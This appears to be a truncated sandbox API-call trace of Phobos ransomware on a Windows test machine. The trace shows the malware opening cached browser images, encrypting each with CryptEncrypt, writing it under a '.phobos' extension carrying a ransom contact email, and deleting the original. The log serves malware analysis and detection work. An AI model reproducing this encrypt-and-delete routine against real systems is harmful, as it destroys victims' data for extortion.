[0177.484] CloseHandle (hObject=0x17c) returned 1 [0177.484] CloseHandle (hObject=0x15c) returned 1 [0177.484] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBPS37[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbps37[1].png")) returned 1 [0177.486] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0177.486] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBQiBF[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbqibf[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.491] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=4857) returned 1 [0177.491] CloseHandle (hObject=0x15c) returned 1 [0177.491] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBQiBF[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbqibf[1].jpg")) returned 0x2020 [0177.491] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBQiBF[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbqibf[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBQiBF[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbqibf[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.491] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.491] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBQiBF[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbqibf[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.492] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0177.492] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.492] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x12f9, lpOverlapped=0x0) returned 1 [0177.521] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1300, dwBufLen=0x1300 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1300) returned 1 [0177.521] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1300, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1300, lpOverlapped=0x0) returned 1 [0177.522] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0177.522] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.522] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0177.522] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.522] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0177.522] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.522] CloseHandle (hObject=0x15c) returned 1 [0177.522] CloseHandle (hObject=0x17c) returned 1 [0177.522] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBQiBF[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbqibf[1].jpg")) returned 1 [0177.523] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0177.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBty8h[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbty8h[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.524] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2473) returned 1 [0177.524] CloseHandle (hObject=0x17c) returned 1 [0177.524] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBty8h[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbty8h[1].jpg")) returned 0x2020 [0177.524] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBty8h[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbty8h[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.524] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBty8h[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbty8h[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.524] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.524] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.524] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBty8h[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbty8h[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.525] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0177.525] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.525] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x9a9, lpOverlapped=0x0) returned 1 [0177.526] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x9b0, dwBufLen=0x9b0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x9b0) returned 1 [0177.526] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x9b0, lpOverlapped=0x0) returned 1 [0177.527] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0177.527] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.527] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0177.527] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.527] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0177.527] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.527] CloseHandle (hObject=0x17c) returned 1 [0177.527] CloseHandle (hObject=0x15c) returned 1 [0177.528] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBty8h[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbty8h[1].jpg")) returned 1 [0177.529] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0177.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVACL[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvacl[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.530] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=6920) returned 1 [0177.530] CloseHandle (hObject=0x15c) returned 1 [0177.530] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVACL[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvacl[1].jpg")) returned 0x2020 [0177.530] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVACL[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvacl[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.530] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVACL[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvacl[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.530] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.530] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.530] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVACL[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvacl[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.531] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0177.531] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.531] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1b08, lpOverlapped=0x0) returned 1 [0177.560] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1b10, dwBufLen=0x1b10 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1b10) returned 1 [0177.560] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1b10, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1b10, lpOverlapped=0x0) returned 1 [0177.561] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0177.561] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.561] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0177.561] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.561] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0177.561] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.561] CloseHandle (hObject=0x15c) returned 1 [0177.561] CloseHandle (hObject=0x17c) returned 1 [0177.561] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVACL[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvacl[1].jpg")) returned 1 [0177.562] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0177.562] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVMtX[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvmtx[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.563] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2384) returned 1 [0177.563] CloseHandle (hObject=0x17c) returned 1 [0177.563] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVMtX[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvmtx[1].jpg")) returned 0x2020 [0177.563] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVMtX[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvmtx[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVMtX[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvmtx[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0177.564] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.564] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVMtX[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvmtx[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.564] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0177.564] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.564] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x950, lpOverlapped=0x0) returned 1 [0177.566] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x960, dwBufLen=0x960 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x960) returned 1 [0177.566] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x960, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x960, lpOverlapped=0x0) returned 1 [0177.566] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32968) returned 1 [0177.566] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0177.567] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0177.567] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.567] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0177.567] CryptDestroyKey (hKey=0xa32d68) returned 1 [0177.567] CloseHandle (hObject=0x17c) returned 1 [0177.567] CloseHandle (hObject=0x15c) returned 1 [0177.567] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVMtX[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvmtx[1].jpg")) returned 1 [0177.568] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0177.568] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVYsu[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvysu[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.569] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=7098) returned 1 [0177.569] CloseHandle (hObject=0x15c) returned 1 [0177.569] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVYsu[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvysu[1].jpg")) returned 0x2020 [0177.569] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVYsu[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvysu[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVYsu[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbbvysu[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0177.569] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.569] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0177.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBBVYsu[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet 